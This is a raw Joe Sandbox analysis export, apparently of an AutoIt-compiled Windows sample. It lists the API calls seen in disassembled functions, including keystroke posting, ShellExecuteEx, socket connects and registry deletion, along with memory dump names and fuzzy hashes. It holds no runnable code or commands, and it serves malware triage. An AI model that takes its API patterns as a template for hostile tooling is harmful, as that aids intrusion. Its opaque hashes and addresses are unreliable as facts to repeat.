                      APIs
                      • IsWindow.USER32(01775850), ref: 00EFB6A5
                      • IsWindowEnabled.USER32(01775850), ref: 00EFB6B1
                      • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00EFB795
                      • SendMessageW.USER32(01775850,000000B0,?,?), ref: 00EFB7CC
                      • IsDlgButtonChecked.USER32(?,?), ref: 00EFB809
                      • GetWindowLongW.USER32(01775850,000000EC), ref: 00EFB82B
                      • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00EFB843
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                      • String ID:
                      • API String ID: 4072528602-0
                      • Opcode ID: 4dd669d37dce138f41d7ee2ee97b122e5226c4762b9f68dd454b36968810ed95
                      • Instruction ID: d78831f99c32c531edc601e3b2d84786472a00032ace1c6d9a92aa76300efbad
                      • Opcode Fuzzy Hash: 4dd669d37dce138f41d7ee2ee97b122e5226c4762b9f68dd454b36968810ed95
                      • Instruction Fuzzy Hash: 0871BF34604208AFDB20AF64C894FBA7BB9FF89314F15516AEA45F72A1C731AD41DB50
                      APIs
                      • _memset.LIBCMT ref: 00EEF75C
                      • _memset.LIBCMT ref: 00EEF825
                      • ShellExecuteExW.SHELL32(?), ref: 00EEF86A
                        • Part of subcall function 00E79997: __itow.LIBCMT ref: 00E799C2
                        • Part of subcall function 00E79997: __swprintf.LIBCMT ref: 00E79A0C
                        • Part of subcall function 00E8FEC6: _wcscpy.LIBCMT ref: 00E8FEE9
                      • GetProcessId.KERNEL32(00000000), ref: 00EEF8E1
                      • CloseHandle.KERNEL32(00000000), ref: 00EEF910
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                      • String ID: @
                      • API String ID: 3522835683-2766056989
                      • Opcode ID: 0e4744cb9d7d501a99dc05d3e182083aad225757e1ec04e227a7c26cf418cc28
                      • Instruction ID: 878fce18d0a74cad14c70e793da7b0a8f9db673de7e17037204699813a41ac23
                      • Opcode Fuzzy Hash: 0e4744cb9d7d501a99dc05d3e182083aad225757e1ec04e227a7c26cf418cc28
                      • Instruction Fuzzy Hash: 1661AD75A00659DFCF14EF65C4809AEBBF4FF88310B149469E85ABB352CB31AD40CB94
                      APIs
                      • GetParent.USER32(?), ref: 00ED149C
                      • GetKeyboardState.USER32(?), ref: 00ED14B1
                      • SetKeyboardState.USER32(?), ref: 00ED1512
                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 00ED1540
                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 00ED155F
                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00ED15A5
                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00ED15C8
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: MessagePost$KeyboardState$Parent
                      • String ID:
                      • API String ID: 87235514-0
                      • Opcode ID: fa981e5be88135ab0fd9a0b53320746b1097fefb385bbb1d60cb81ce445c35a7
                      • Instruction ID: 402fd5f51aa5ddf6a0fa69077530704fb99442073a0e55aea3c59d2b4754f434
                      • Opcode Fuzzy Hash: fa981e5be88135ab0fd9a0b53320746b1097fefb385bbb1d60cb81ce445c35a7
                      • Instruction Fuzzy Hash: E95103A06083D53EFB3646348C45BBA7EA99B46308F0894CAE1D569AD2C298EC86D750
                      APIs
                      • GetParent.USER32(00000000), ref: 00ED12B5
                      • GetKeyboardState.USER32(?), ref: 00ED12CA
                      • SetKeyboardState.USER32(?), ref: 00ED132B
                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00ED1357
                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00ED1374
                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00ED13B8
                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00ED13D9
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: MessagePost$KeyboardState$Parent
                      • String ID:
                      • API String ID: 87235514-0
                      • Opcode ID: b1805ce53dbcf10431f9a461fd3be5eb7a6162cd739d7746435013a870eb8874
                      • Instruction ID: 2d8f824226c4941b2a2fad4a027bf538609afb3be52a5f496f968d0c4191af8a
                      • Opcode Fuzzy Hash: b1805ce53dbcf10431f9a461fd3be5eb7a6162cd739d7746435013a870eb8874
                      • Instruction Fuzzy Hash: B75126A05043D57DFB3283248C41B7A7FA9DF06308F08A4CBE1D466AD2D395EC9AE750
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: _wcsncpy$LocalTime
                      • String ID:
                      • API String ID: 2945705084-0
                      • Opcode ID: c7ee0bced6dfe0d1677d811f983c72d6f5fb2970f8652f0b167346dec7cfc268
                      • Instruction ID: 204e18181d2f1f4c58f167cdf06b07d846b098f7cccb2d0bacb712134c7ff7ab
                      • Opcode Fuzzy Hash: c7ee0bced6dfe0d1677d811f983c72d6f5fb2970f8652f0b167346dec7cfc268
                      • Instruction Fuzzy Hash: 704142A6C2052876CF11EBF488869CF77E8EF05310F50A956F918F3261E634D715C7A6
                      APIs
                        • Part of subcall function 00ED48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00ED38D3,?), ref: 00ED48C7
                        • Part of subcall function 00ED48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00ED38D3,?), ref: 00ED48E0
                      • lstrcmpiW.KERNEL32(?,?), ref: 00ED38F3
                      • _wcscmp.LIBCMT ref: 00ED390F
                      • MoveFileW.KERNEL32(?,?), ref: 00ED3927
                      • _wcscat.LIBCMT ref: 00ED396F
                      • SHFileOperationW.SHELL32(?), ref: 00ED39DB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                      • String ID: \*.*
                      • API String ID: 1377345388-1173974218
                      • Opcode ID: 253d2d0de57c9d6317caa85decb51ccc5919d1a85cc985b5b1c2f89f6f20786c
                      • Instruction ID: d005dc773e553cd5f6a40b3024f017534475e2e9f90c3441bb47bad5545e2dd1
                      • Opcode Fuzzy Hash: 253d2d0de57c9d6317caa85decb51ccc5919d1a85cc985b5b1c2f89f6f20786c
                      • Instruction Fuzzy Hash: 95417EB25093449ECB51EF64C4919EFB7E8EF88340F00292FB489E3251EA74D689C752
                      APIs
                      • _memset.LIBCMT ref: 00EF7519
                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EF75C0
                      • IsMenu.USER32(?), ref: 00EF75D8
                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00EF7620
                      • DrawMenuBar.USER32 ref: 00EF7633
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Menu$Item$DrawInfoInsert_memset
                      • String ID: 0
                      • API String ID: 3866635326-4108050209
                      • Opcode ID: 7188522f2bb7bd9a2a3a3c173918b19ce989136e04198b95554fb3beb4d56589
                      • Instruction ID: 13a4cd8b38ad5ca4e0a35146ca851b352b2e893904bda5ee55c5e223afdae41c
                      • Opcode Fuzzy Hash: 7188522f2bb7bd9a2a3a3c173918b19ce989136e04198b95554fb3beb4d56589
                      • Instruction Fuzzy Hash: 1C412875A04608EFDB20DF94D884AAABBF9FF08314F059129EE55A7350D730AD54CFA0
                      APIs
                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00EF125C
                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EF1286
                      • FreeLibrary.KERNEL32(00000000), ref: 00EF133D
                        • Part of subcall function 00EF122D: RegCloseKey.ADVAPI32(?), ref: 00EF12A3
                        • Part of subcall function 00EF122D: FreeLibrary.KERNEL32(?), ref: 00EF12F5
                        • Part of subcall function 00EF122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00EF1318
                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00EF12E0
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: EnumFreeLibrary$CloseDeleteOpen
                      • String ID:
                      • API String ID: 395352322-0
                      • Opcode ID: 27fb59f247a989ebfe5ce4cc7718d0918dc3ba20bafe8c6bf055d05ef3e27f4d
                      • Instruction ID: cc52f0048640869a41f8923acebcd980d42e0dce3a704ae795e611cad8b9c9b7
                      • Opcode Fuzzy Hash: 27fb59f247a989ebfe5ce4cc7718d0918dc3ba20bafe8c6bf055d05ef3e27f4d
                      • Instruction Fuzzy Hash: 7F3109B190111DFFEB159B91DC89EFEB7BCEF08304F0051AAE601F2151EA749E49DAA4
                      APIs
                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00EF655B
                      • GetWindowLongW.USER32(01775850,000000F0), ref: 00EF658E
                      • GetWindowLongW.USER32(01775850,000000F0), ref: 00EF65C3
                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00EF65F5
                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00EF661F
                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00EF6630
                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00EF664A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: LongWindow$MessageSend
                      • String ID:
                      • API String ID: 2178440468-0
                      • Opcode ID: 9acee9adc5fc5eaa86ee9990a4c9019f55b466c9b1ea713eedc27ae77a86904e
                      • Instruction ID: dd5517df3cc2f44a5bda95216241465ed58f5c3eb8955334ccfc311985fedfce
                      • Opcode Fuzzy Hash: 9acee9adc5fc5eaa86ee9990a4c9019f55b466c9b1ea713eedc27ae77a86904e
                      • Instruction Fuzzy Hash: 0F310331604118AFDB208F19DC84F6537E1FF4A328F1951A8F605EB2B6CB61AC44DB91
                      APIs
                        • Part of subcall function 00EE80A0: inet_addr.WSOCK32(00000000), ref: 00EE80CB
                      • socket.WSOCK32(00000002,00000001,00000006), ref: 00EE64D9
                      • WSAGetLastError.WSOCK32(00000000), ref: 00EE64E8
                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00EE6521
                      • connect.WSOCK32(00000000,?,00000010), ref: 00EE652A
                      • WSAGetLastError.WSOCK32 ref: 00EE6534
                      • closesocket.WSOCK32(00000000), ref: 00EE655D
                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00EE6576
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                      • String ID:
                      • API String ID: 910771015-0
                      • Opcode ID: d94a74fe76a04468eb84543046a06f26b021bc33cc6c94a31187c2fb76661d9b
                      • Instruction ID: e6f8e4b4bdb631615f1f678c0923d7e7d9ca73a6f670b9159c2ef7c6a68f2c4b
                      • Opcode Fuzzy Hash: d94a74fe76a04468eb84543046a06f26b021bc33cc6c94a31187c2fb76661d9b
                      • Instruction Fuzzy Hash: BB31A171600118AFDB10AF25DC85BBE7BE8EF94764F009069F909B72D1CB70AD08CB61
                      APIs
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00ECE0FA
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00ECE120
                      • SysAllocString.OLEAUT32(00000000), ref: 00ECE123
                      • SysAllocString.OLEAUT32 ref: 00ECE144
                      • SysFreeString.OLEAUT32 ref: 00ECE14D
                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00ECE167
                      • SysAllocString.OLEAUT32(?), ref: 00ECE175
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                      • String ID:
                      • API String ID: 3761583154-0
                      • Opcode ID: ce3dd492c5aa9b64242dc2a241a5d8dc29cb21ba66a0201145ac8b89af9af9d0
                      • Instruction ID: 0b80d3ba3076f283b143a596d6a66563bb436cc5225eb37d0d44096fe840ff1d
                      • Opcode Fuzzy Hash: ce3dd492c5aa9b64242dc2a241a5d8dc29cb21ba66a0201145ac8b89af9af9d0
                      • Instruction Fuzzy Hash: E421A132601108AF9B109FA9DD88DBB77ECEF49760B448129F914EB360DA71DC42CB64
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: __wcsnicmp
                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                      • API String ID: 1038674560-2734436370
                      • Opcode ID: bdf27722cda015e888fa74c73b23c837e4e36541b7343a8a017f5d0bad45fac4
                      • Instruction ID: 49a9adefa1611336c130d6d02bb3d8a25eaa137e9571f2d37ad253506bcd9200
                      • Opcode Fuzzy Hash: bdf27722cda015e888fa74c73b23c837e4e36541b7343a8a017f5d0bad45fac4
                      • Instruction Fuzzy Hash: 04213A7220415166D630E634DE12FE7B3E9DF51354F14A03DF885B6181EB73AE83E2A5
                      APIs
                        • Part of subcall function 00E71D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E71D73
                        • Part of subcall function 00E71D35: GetStockObject.GDI32(00000011), ref: 00E71D87
                        • Part of subcall function 00E71D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E71D91
                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00EF78A1
                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00EF78AE
                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00EF78B9
                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00EF78C8
                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00EF78D4
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: MessageSend$CreateObjectStockWindow
                      • String ID: Msctls_Progress32
                      • API String ID: 1025951953-3636473452
                      • Opcode ID: 0165fae795f1ad804bb39d86d9cb34cb4bcfec1778e70c3564113c91befefc82
                      • Instruction ID: d802f4a06b36322d646b30c51015666d5f89ac1e016b6cb156e004209e995d8d
                      • Opcode Fuzzy Hash: 0165fae795f1ad804bb39d86d9cb34cb4bcfec1778e70c3564113c91befefc82
                      • Instruction Fuzzy Hash: 2B118EB211022DBEEF159E60CC85EE77F6DEF087A8F015124FB44A2090CB729C21DBA4
                      APIs
                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00E94292,?), ref: 00E941E3
                      • GetProcAddress.KERNEL32(00000000), ref: 00E941EA
                      • EncodePointer.KERNEL32(00000000), ref: 00E941F6
                      • DecodePointer.KERNEL32(00000001,00E94292,?), ref: 00E94213
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                      • String ID: RoInitialize$combase.dll
                      • API String ID: 3489934621-340411864
                      • Opcode ID: e3296cfec77c54d87a669595548f3ea1b7c176bd421d2624c03d65183437c566
                      • Instruction ID: 7f9f9b08c6801b7605c1236169d4978f6c6096dee2b81566568ab2aa79870b9f
                      • Opcode Fuzzy Hash: e3296cfec77c54d87a669595548f3ea1b7c176bd421d2624c03d65183437c566
                      • Instruction Fuzzy Hash: 44E012B06917449EEF116B72EC4DF243696BB51716F504424F411F50F0DBF56495EF20
                      APIs
                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00E941B8), ref: 00E942B8
                      • GetProcAddress.KERNEL32(00000000), ref: 00E942BF
                      • EncodePointer.KERNEL32(00000000), ref: 00E942CA
                      • DecodePointer.KERNEL32(00E941B8), ref: 00E942E5
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                      • String ID: RoUninitialize$combase.dll
                      • API String ID: 3489934621-2819208100
                      • Opcode ID: cc2bb689d9805d28c0b7f752a30ce9729e5ad84dd5c274c130f963b22fd5e5e6
                      • Instruction ID: 7cdebf43aceba428a10d62c50bd6a441720b261045dd7972d20e2e34b9b3f516
                      • Opcode Fuzzy Hash: cc2bb689d9805d28c0b7f752a30ce9729e5ad84dd5c274c130f963b22fd5e5e6
                      • Instruction Fuzzy Hash: D7E0B6B8692705AFEB51AB61EC0DF153AA6BB64B56F104024F001F12F0CBB4A988FA15
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: _memmove$__itow__swprintf
                      • String ID:
                      • API String ID: 3253778849-0
                      • Opcode ID: cd0f19026607771e4206361ee0657024ef77af5333a46932f83a890dab33a7b6
                      • Instruction ID: 9f8a1b431f10ccb39d5747a8c1d13ed3ce982a487aa6ca9283ece15248dc7883
                      • Opcode Fuzzy Hash: cd0f19026607771e4206361ee0657024ef77af5333a46932f83a890dab33a7b6
                      • Instruction Fuzzy Hash: 8161BB3050065A9BDF15EF20C882EFE37E5EF84308F04A55AF9597B292DB31AD42DB50
                      APIs
                        • Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82
                        • Part of subcall function 00EF10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EF0038,?,?), ref: 00EF10BC
                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EF0548
                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EF0588
                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00EF05AB
                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00EF05D4
